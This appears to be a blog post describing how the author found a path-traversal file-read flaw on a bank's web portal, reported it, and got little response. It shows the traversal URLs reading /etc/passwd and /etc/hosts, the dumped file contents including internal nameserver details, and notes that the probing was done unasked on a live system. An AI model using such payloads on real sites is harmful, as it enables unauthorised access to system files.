How i found an LFI vulnerability on a major banking site

Well yes, the title is a bit clickbait but that’s what exactly happened some weeks ago when i was bored on an italian banking website, let’s call it MPBbanking.

As always with “Great updates comes great responsability” for the Sysadmins that maintain such systems and that day since was their migration day from an old platform to a new one (from mpbbanking to youweb.bankmpb) i decided to explore what new features this portal has to offer… Just a few clicks and everything seems responsive and too cool to be good so i tried out the good’old LFI to be sure that everything was safe and configured correctly…
Types on the web browser URL: youweb.bankmpb.it/../../../../etc/passwd

Created by anaconda

Users And Groups Exposed

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
..
..
.

At the beginning my reaction was like.. Well that must be a honeypot because they should have a real-badass Sysadmin(s) running HIDS/DPI/Sensors/Alerts & Monitoring every breath of any system in the radius
of an entire DC.

But then i said well what if they aren’t so badass and missed that, so i type: youweb.bankmpb.it/../../../../etc/hosts and then .. :


##########################
#####ATTENZIONE !!
##
##FILE GESTITO DA PUPPET
##NON MODIFICARE A MANO
###########################
#
###########
VERONA
###########
options timeout:1 attempts:1
search servizi .group *.group *.zserver *.nexus
nameserver *.
.5.25
nameserver ..5.26
nameserver ..140.25
#nameserver ..140.26


127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4

..203.12 ..group




Wow… we are dealing with a DevOpser (Master of Puppets)…and that is an LFI (
hacker-voice* “we are in”, and i didn’t even need my great tool inspect element to hack their JS/CSS).
So i kept checking if i can find the contact of their Sysadmin to report him this vulnerability that could cost them $$ if exploited well…. checking postfix conf for contact :

#trap decode to catch security attacks
decode: root

#Person who should get root’s mail
#root: marc
#root: [email protected],[email protected]



Well if they should get root’s mail then i’ll contact them about this.
The day after i got this “Macro” reply from “frank” :
Good afternoon Sami,
Thank you for the advisory.

We have forwarded our email to the right departement that will analyse the context and take remedial action


Best Regards,
Frank

Sent from my IBM Verse


Yep probably the “right departement” is his colleague next to him and he used this “Macro”.


Just some hours after this email they started to fix this LFI and no feedback.

The next day i sent them another email (cc’ing some other colleagues email addresses) asking if they have any running “Whitehat/Bug bounty program” because if this is how they keep things secure even a script kiddie could find some interesting stuff in their systems.

12 Days later –> Still no reply –> What a great way to give feedback to fellow Sysadmin that helped out and reported to you a vulnerability in your systems.


Yep, i know that MPBCORP is big and probably no one cares because i’m the only one (or someone else found out and was trying to hack you silently) that noticed this but what if they breached some serious data from your system and custumer data was at risk?


What could have happened (From less to more skilled):